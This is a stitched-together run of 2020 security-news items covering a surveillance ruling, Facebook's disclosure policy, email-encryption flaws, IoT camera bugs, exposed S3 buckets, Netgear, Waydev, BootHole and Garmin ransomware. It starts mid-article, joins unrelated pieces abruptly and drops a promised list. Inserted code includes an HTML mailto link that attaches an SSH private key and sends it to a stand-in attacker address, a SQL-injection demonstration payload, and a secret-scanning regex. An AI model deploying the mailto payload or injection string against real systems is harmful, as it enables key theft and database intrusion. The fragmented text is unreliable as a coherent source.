The panel went on to administer a light slapping to those insisting that the metadata programme was an essential element in the case. The evidence, such as it was, “did not taint the evidence introduced by the government at trial,” the panel observed before going on to say: “To the extent the public statements of government officials created a contrary impression, that impression is inconsistent with the contents of the classified record.”
Thus not only illegal, possibly unconstitutional but also not particularly helpful in this instance, no matter what officials might have insisted.
While the American Civil Liberties Union (ACLU) declared the ruling “a victory for our privacy rights”, the process could have a while to run yet, including a trip to America’s Supreme Court.
Facebook has published its first Vulnerability Disclosure Policy and given itself grounds to blab the existence of bugs to the world if it thinks that’s the right thing to do.
“Facebook may occasionally find critical security bugs or vulnerabilities in third-party code and systems, including open source software,” the company writes. “When that happens, our priority is to see these issues promptly fixed, while making sure that people impacted are informed so that they can protect themselves by deploying a patch or updating their systems.”
The Social Network™ has made itself the arbiter of what needs to be disclosed and when it needs to be disclosed. The company’s policy is to contact “the appropriate responsible party” and give them 21 days to respond.
“Facebook will evaluate based on our interpretation of the risk to people.”
“If we don’t hear back within 21 days after reporting, Facebook reserves the right to disclose the vulnerability,” the policy says, adding: “If within 90 days after reporting there is no fix or update indicating the issue is being addressed in a reasonable manner, Facebook will disclose the vulnerability.”
But the company has also outlined exceptions to those rules, accelerating disclosure if a bug is already being exploited and slowing it down “if a project’s release cycle dictates a longer window.”
The third reason is:
“If a fix is ready and has been validated, but the project owner unnecessarily delays rolling out the fix, we might initiate the disclosure prior to the 90-day deadline when the delay might adversely impact the public.”
Facebook “will evaluate each issue on a case-by-case basis based on our interpretation of the risk to people.”
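Taken together, the policy boils down to two default clocks that both start at the report date: 21 days for a response, 90 days for a fix. A small sketch of that timeline (dates purely illustrative):

```python
from datetime import date, timedelta

def disclosure_deadlines(reported: date) -> dict[str, date]:
    """Deadlines implied by the stated policy: disclosure is allowed
    after 21 days of silence, and after 90 days without a fix underway."""
    return {
        "no_response_disclosure": reported + timedelta(days=21),
        "no_fix_disclosure": reported + timedelta(days=90),
    }

d = disclosure_deadlines(date(2020, 9, 1))
print(d["no_response_disclosure"])  # 2020-09-22
print(d["no_fix_disclosure"])       # 2020-11-30
```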
The policy isn’t wildly different from that used by Google’s Project Zero, which also discloses bugs after 90 days and also offers extensions under some circumstances.
Can’t send something on Gmail? If so, you’re in good company: since about midnight ET, people have been complaining about issues connecting to many of the G Suite services, especially Gmail.
I’ve been able to send emails, but trying to attach a file shows a slow upload process that, if it completes, eventually leads to an error message saying that I need to check my network. It’s the same thing many others are experiencing, but at least it’s working a little. Oh, and if things weren’t bad enough for remote workers on this shift, it looks like Slack is having some issues too.
Update (2:14 AM ET): Google’s status page says they are continuing to investigate the issue. It has also updated to indicate reports of problems with Google Meet, Google Voice and Google Docs, while anecdotal reports show people are having issues uploading to YouTube as well.
8/20/20, 1:29 AM We’re investigating reports of an issue with Gmail. We will provide more information shortly.
8/20/20, 2:07 AM We are continuing to investigate this issue. We will provide an update by 8/20/20, 4:00 AM detailing when we expect to resolve the problem.
A security researcher has detailed how an artificial intelligence company in possession of nearly 2.6 million medical records allowed them to be publicly visible on the internet. It’s a clear reminder that our personal health data is not safe.
As Secure Thoughts reports, on July 7 security researcher Jeremiah Fowler discovered two folders of medical records available for anyone to access on the internet. The data was labeled as “staging data” and hosted by artificial intelligence company Cense AI, which specializes in “SaaS-based intelligent process automation management solutions.” Fowler believes the data was made public because Cense AI was temporarily hosting it online before loading it into the company’s management system or an AI bot.
The medical records are quite detailed and include names, insurance records, medical diagnosis notes, and payment records. It looks as though the data was sourced from insurance companies and relates to car accident claims and referrals for neck and spine injuries. The majority of the personal information is thought to be for individuals located in New York, with a total of 2,594,261 records exposed.
Boffins testing the security of OpenPGP and S/MIME, two end-to-end encryption schemes for email, recently found multiple vulnerabilities in the way email client software deals with certificates and key exchange mechanisms.
They found that five out of 18 OpenPGP-capable email clients and six out of 18 S/MIME-capable clients are vulnerable to at least one attack.
These flaws are not due to cryptographic weaknesses. Rather, they arise from the complexity of email infrastructure, which is built on dozens of standards documents and has evolved over time, and from the impact that has had on the way affected email clients handle certificates and digital signatures.
In a paper [PDF] titled “Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption,” presented earlier this summer at the virtual IEEE Conference on Communications and Network Security, Jens Müller, Marcus Brinkmann, and Joerg Schwenk (Ruhr University Bochum, Germany) and Damian Poddebniak and Sebastian Schinzel (Münster University of Applied Sciences, Germany) reveal how they were able to conduct key replacement, MITM decryption, and key exfiltration attacks on various email clients.
“We show practical attacks against both encryption schemes in the context of email,” the paper explains.
“First, we present a design flaw in the key update mechanism, allowing a third party to deploy a new key to the communication partners. Second, we show how email clients can be tricked into acting as an oracle for decryption or signing by exploiting their functionality to auto-save drafts. Third, we demonstrate how to exfiltrate the private key, based on proprietary mailto parameters implemented by various email clients.”
This is not the sort of thing anyone trying to communicate securely over email wants because it means encrypted messages may be readable by an attacker and credentials could be stolen.
Müller offered a visual demonstration via Twitter on Tuesday:
Have you ever heard of the mailto:?attach=~/… parameter? It allows to include arbitrary files on disk. So, why break PGP if you can politely ask the victim’s mail client to include the private key? (1/4) pic.twitter.com/7ub9dJZJaO
The research led to CVEs for GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), and IBM/HCL Notes (CVE-2020-4089). There are two more CVEs (CVE-2020-12618, and CVE-2020-12619) that haven’t been made public.
According to Müller, affected vendors were notified of the vulnerabilities in February.
Pegasus Mail is said to be affected though it doesn’t have a designated CVE – it may be that one of the unidentified CVEs applies here.
Thunderbird versions 52 and 60 for Debian/Kali Linux were affected but more recent versions are supposed to be immune since the email client’s developers fixed the applicable flaw last year. It allowed a website to present a link with the "mailto?attach=..." parameter to force Thunderbird to attach local files, like an SSH private key, to an outgoing message.
However, those who have installed the xdg-utils package, a set of utility scripts that provide a way to launch an email application in response to a mailto: link, appear to have reactivated this particular bug, which has yet to be fixed in xdg-utils.
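The key-exfiltration vector is startlingly simple in form. Below is a sketch of the kind of link the paper describes, here targeting an SSH private key; whether a client honors `attach=` at all, and the exact parameter syntax, varies by client and version:

```html
<!-- A web-page link that asks a vulnerable mail client to silently
     attach a local file to the message it drafts. Addresses are
     illustrative. -->
<a href="mailto:attacker@example.com?subject=hello&attach=~/.ssh/id_rsa">
  Contact us
</a>
```

If the victim then sends the drafted message without noticing the attachment, their private key lands in the attacker's inbox.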
More than 3.7 million. That’s the latest number of surveillance cameras, baby monitors, doorbells with webcams, and other internet-connected devices found left open to hijackers via two insecure communications protocols globally, we’re told.
This is up from estimates of a couple of million last year. The protocols are CS2 Network P2P, used by more than 50 million devices worldwide, and Shenzhen Yunni iLnkP2P, used by more than 3.6 million. The P2P stands for peer-to-peer. The devices’ use of the protocols cannot be switched off.
The upshot is Internet-of-Things gadgets using vulnerable iLnkP2P implementations can be discovered and accessed by strangers, particularly if the default password has not been changed or is easily guessed. Thus miscreants can abuse the protocol to spy on poorly secured cameras and other equipment dotted all over the world (CVE-2019-11219). iLnkP2P connections can also be intercepted by eavesdroppers to snoop on live video streams, login details, and other data (CVE-2019-11220).
Meanwhile, CS2 Network P2P can fall to the same sort of snooping as iLnkP2P (CVE-2020-9525, CVE-2020-9526). iLnkP2P is, we’re told, functionally identical to CS2 Network P2P though there are some differences.
The bugs were found by Paul Marrapese, who has a whole site, hacked.camera, dedicated to the vulnerabilities. “As of August 2020, over 3.7 million vulnerable devices have been found on the internet,” reads the site, which lists affected devices and advice on what to do if you have any at-risk gear. (Summary: throw it away, or try firewalling it off.)
He went public with the CS2 Network P2P flaws this month after being told in February by the protocol’s developers that the weaknesses would be addressed in version 4.0. In 2019, he tried to report the iLnkP2P flaws to developer Shenzhen Yunni, received no response, and went public with those bugs in April that year.
At this year’s DEF CON hacking conference, held online last week, Marrapese gave an in-depth dive into the insecure protocols, which you can watch below.
“When hordes of insecure things get put on the internet, you can bet the end result is not going to be pretty,” Marrapese, a red-team member at an enterprise cloud biz, told his web audience. “A $40 purchase from Amazon is all you need to start hacking into devices.”
The protocols use UDP port 32100, and are outlined here by Fabrizio Bertone, who reverse engineered them in 2017. Essentially, they’re designed to let non-tech-savvy owners access their devices, wherever they are. The equipment contacts central servers to announce they’re powered up, and they stay connected by sending heartbeat messages to the servers. These cloud-hosted servers thus know which IP addresses the gadgets are using, and stay in constant touch with the devices.
When a user wants to connect to their device, and starts an app to log into their gadget, the servers will tell the app how to connect to the camera, or whatever it may be, either via the local network or over the internet. If need be, the device and app will be instructed to use something called UDP hole punching to talk to each other through whatever NATs may be in their way, or via a relay if that doesn’t work. This allows the device to be used remotely by the app without having to, say, change any firewall or NAT settings on their home router. The app and device find a way to talk to each other.
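The punching step can be sketched in a few lines. The toy below runs both "peers" on localhost, so there is no real NAT to traverse; it only illustrates the simultaneous send that, in a real deployment, opens the NAT mappings on each side so the other's packets can get through:

```python
import socket

def make_peer(port: int) -> socket.socket:
    """Create a UDP 'peer' bound to a local port (ports are arbitrary)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(("127.0.0.1", port))
    s.settimeout(2)
    return s

# In a real deployment each device learns the other's public (IP, port)
# from the rendezvous server; here we simply hard-code the endpoints.
a = make_peer(40001)
b = make_peer(40002)

# Each side fires a packet at the other's endpoint. Behind NATs, these
# outbound packets are what create the mappings that let replies in.
a.sendto(b"punch-from-a", ("127.0.0.1", 40002))
b.sendto(b"punch-from-b", ("127.0.0.1", 40001))

msg_at_b, _ = b.recvfrom(1024)
msg_at_a, _ = a.recvfrom(1024)
print(msg_at_b, msg_at_a)
```

Once both sides have exchanged packets, the app and device talk directly; the relay is only needed when both NATs are too restrictive for this to work.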
“In the context of IoT, P2P is a feature that lets people to connect to their device anywhere in the world without any special setup,” Marrapese said. “You have to remember, some folks don’t even know how to log into their routers, never mind forward a port.”
In the case of iLnkP2P, it turned out it was easy to calculate the unique IDs of strangers’ devices, and thus use the protocol to find and connect to them. The IDs are set at the factory and can’t be changed. Marrapese was able to enumerate millions of gadgets, and use their IP addresses to approximate their physical location, showing equipment scattered primarily across Asia, the UK and Europe, and North America. Many accept the default password, and thus can be accessed by miscreants scanning the internet for vulnerable P2P-connected cameras and the like. According to Marrapese, thousands of new iLnkP2P-connected devices appear online every month.
Misconfigured AWS S3 storage buckets exposing massive amounts of data to the internet are like an unexploded bomb just waiting to go off, say experts.
The team at Truffle Security said its automated search tools were able to stumble across some 4,000 open Amazon-hosted S3 buckets that included data companies would not want public – things like login credentials, security keys, and API keys.
In fact, the leak hunters say exposed data was so common that they counted an average of around 2.5 passwords and access tokens per analyzed file. In some cases a single file held more than 10 secrets; other files had none at all.
These credentials included SQL Server passwords, Coinbase API keys, MongoDB credentials, and logins for other AWS buckets that actually were configured to ask for a password.
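Tools in this space work by pattern-matching file contents against known credential formats. A toy version of the idea (patterns simplified and illustrative; real scanners such as Truffle Security's use many more rules plus entropy analysis):

```python
import re

# Two illustrative patterns: AWS access key IDs follow a documented
# "AKIA" + 16 uppercase alphanumerics shape; the second is a crude
# catch-all for hard-coded passwords.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_password": re.compile(r"password\s*[=:]\s*\S+", re.I),
}

def find_secrets(text: str) -> list[tuple[str, str]]:
    """Return (rule_name, matched_text) pairs for every hit."""
    hits = []
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            hits.append((name, match.group(0)))
    return hits

sample = 'db_password = "hunter2"\naws_key = AKIAABCDEFGHIJKLMNOP'
print(find_secrets(sample))
```

Run against thousands of public buckets, even crude rules like these surface plenty of live credentials, which is exactly what makes the exposed-bucket problem so explosive.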
That the Truffle Security team was able to turn up roughly 4,000 insecure buckets with private information shows just how common it is for companies to leave their cloud storage instances unguarded.
Though AWS has done what it can to get customers to lock down their cloud instances, finding exposed storage buckets and databases is pretty trivial for trained security professionals to pull off.
In some cases, the leak-hunters have even partnered up with law firms, collecting referral fees when they send aggrieved customers to take part in class-action lawsuits against companies that exposed their data.
With over 3 billion users globally, smartphones are an integral, almost inseparable part of our day-to-day lives.
As the mobile market continues to grow, vendors race to provide new features, new capabilities and better technological innovations in their latest devices. To support this relentless drive for innovation, vendors often rely on third parties to provide the required hardware and software for phones. One of the most common third-party solutions is the Digital Signal Processor unit, commonly known as DSP chips.
In this research dubbed “Achilles” we performed an extensive security review of a DSP chip from one of the leading manufacturers: Qualcomm Technologies. Qualcomm provides a wide variety of chips that are embedded into devices that make up over 40% of the mobile phone market, including high-end phones from Google, Samsung, LG, Xiaomi, OnePlus and more.
More than 400 vulnerable pieces of code were found within the DSP chip we tested, and these vulnerabilities could have the following impact on users of phones with the affected chip:
Attackers can turn the phone into a perfect spying tool, without any user interaction required. The information that can be exfiltrated includes photos, videos, call recordings, real-time microphone data, GPS and location data, and more.
Attackers may be able to render the phone constantly unresponsive, making all the information stored on it permanently unavailable, including photos, videos, and contact details; in other words, a targeted denial-of-service attack.
Malware and other malicious code can completely hide their activities and become unremovable.
We disclosed these findings to Qualcomm, which acknowledged them, notified the relevant device vendors, and assigned the following CVEs: CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209.
The Focals glasses come with prescription lenses as an option, meaning they can function as everyday prescription eyewear. The bulky frames, housing a laser, battery, and other kit, will no longer do anything that regular spectacles cannot do.
Ben Wood, chief analyst at CCS Insight, said the pulling of features from cloud-powered hardware is not uncommon – and something that has happened to him before.
“If you want to be an early adopter and have some fun new tech that an ambitious start-up has created, there’s always a risk that they won’t be able to make the business plan stack up,” he warned.
“That could either mean the service stops working or you end up finding you have to pay additional charges to maintain service continuity.”
Netgear has quietly decided not to patch more than 40 home routers to plug a remote code execution vulnerability – despite security researchers having published proof-of-concept exploit code.
Keen-eyed Reg readers, however, noticed that Netgear quietly declared 45 of the affected products as “outside the security support period” – meaning those items won’t be updated to protect them against the vuln.
America’s Carnegie-Mellon University summarised the vuln in a note from its Software Engineering Institute: “Multiple Netgear devices contain a stack buffer overflow in the httpd web server’s handling of upgrade_check.cgi, which may allow for unauthenticated remote code execution with root privileges.”
Stung by pressure from infosec researchers that came to a head in June when ZDI went public, Netgear began issuing patches. It had sorted out 28 of the 79 vulnerable product lines by the end of that month.
Infosec biz Grimm, which independently discovered the vuln itself, pitched in by publishing proof-of-concept exploits for the SOHO (Small Office/Home Office) devices.
With today’s revelation that 45 largely consumer and SME-grade items will never be patched, Netgear faces questions over its commitment to older product lines. Such questions have begun to be addressed in Britain by calls from government agencies for new laws forcing manufacturers to reveal devices’ design lifespans at the point of purchase.
[…]
Today Netgear’s advisory page for the patches shows 45 devices’ fix status as “none; outside security support period”. We have collected those devices’ model numbers in the list below:
Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers’ work output by analyzing Git-based codebases. To do this, Waydev runs a special app listed on the GitHub and GitLab app stores.
When users install the app, Waydev receives an OAuth token that it can use to access its customers’ GitHub or GitLab projects. Waydev stores this token in its database and uses it on a daily basis to generate analytical reports for its customers.
Waydev CEO and co-founder Alex Circei told ZDNet today in a phone call that hackers used a blind SQL injection vulnerability to gain access to its database, from where they stole GitHub and GitLab OAuth tokens.
The hackers then used some of these tokens to pivot to other companies’ codebases and gain access to their source code projects.
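Waydev hasn't published the vulnerable query, but the bug class is well understood: untrusted input concatenated directly into SQL. (A blind SQL injection leaks the same data indirectly, one yes/no answer at a time, but the root cause is identical.) A minimal sqlite3 sketch of the flaw and its fix, with schema and values invented for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tokens (user TEXT, oauth_token TEXT)")
conn.execute("INSERT INTO tokens VALUES ('alice', 'gho_secret123')")

user_input = "x' OR '1'='1"  # classic injection payload

# VULNERABLE: string interpolation lets the payload rewrite the query,
# turning the WHERE clause into a tautology that matches every row.
leaked = conn.execute(
    f"SELECT oauth_token FROM tokens WHERE user = '{user_input}'"
).fetchall()
print("vulnerable query leaked:", leaked)

# SAFE: a bound parameter is treated purely as data, never as SQL.
safe = conn.execute(
    "SELECT oauth_token FROM tokens WHERE user = ?", (user_input,)
).fetchall()
print("parameterized query returned:", safe)
```

The parameterized version returns nothing, because no user is literally named `x' OR '1'='1`; the interpolated version hands over every token in the table.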
An annoying vulnerability in the widely used GRUB2 bootloader can be potentially exploited by malware or a rogue insider already on a machine to thoroughly compromise the operating system or hypervisor while evading detection by users and security tools.
[…]
Designated CVE-2020-10713, the vulnerability allows a miscreant to achieve code execution within the open-source bootloader, and effectively control the device at a level above the firmware and below any system software. Bug hunters at Eclypsium, who found the flaw and dubbed it BootHole, said patching the programming blunder will be a priority and a headache for admins.
To be clear, malware or a rogue user must already have administrator privileges on the device to exploit the flaw, which for the vast majority of victims is a game-over situation anyway: you’ve likely lost all your data and network integrity at that point. What this bootloader bug opens up is the ability for a determined miscreant to burrow deeper, run code at a low level beneath other defenses, and compromise the foundation of a system to the point where they cannot easily be detected by administrators or antivirus.
Garmin is reportedly being asked to pay a $10 million ransom to free its systems from a cyberattack that has taken down many of its services for two days.
The navigation company was hit by a ransomware attack on Thursday, leaving customers unable to log fitness sessions in Garmin apps and pilots unable to download flight plans for aircraft navigation systems, among other problems. The company’s communication systems have also been taken offline, leaving it unable to respond to disgruntled customers.
Garmin employees have told BleepingComputer that the company was struck down by the WastedLocker ransomware. Screenshots sent to BleepingComputer show long lists of the company’s files encrypted by the malware, with a ransom note attached to each file.
The ransom note tells the recipient to email one of two email addresses to “get a price for your data”. That price, Garmin’s sources have told BleepingComputer, is $10 million.
Crippled Garmin
The ransomware attack has crippled many of the company’s systems. Reports claim that Garmin’s IT department shut down all of the company’s computers, including those of employees working from home who were connected by VPN, to halt the spread of the ransomware across its network.
Garmin’s Taiwan factories reportedly closed production lines yesterday and today while the company attempts to unpick the ransomware.
The shutdown is having a big effect on Garmin’s customers. DownDetector reveals a huge spike today in people having trouble accessing Garmin Connect, the app that logs fitness routines for the company’s devices. More people are likely to be using such devices at the weekend.
DownDetector shows how Garmin customers continue to be affected
The problem is even more serious for Garmin’s aviation device customers. Pilots have told ZDNet that they are unable to download a version of Garmin’s aviation database onto their airplane navigation systems, which is an FAA requirement.
Garmin has issued very little public comment about the problem. On Thursday, the company issued a tweet saying “we are currently experiencing an outage that affects Garmin Connect,” adding that the outage “also affects our call centers and we are currently unable to receive any calls, emails or online chats”.
Garmin has been approached for comment, but as you can appreciate from the statement above, that’s somewhat complicated…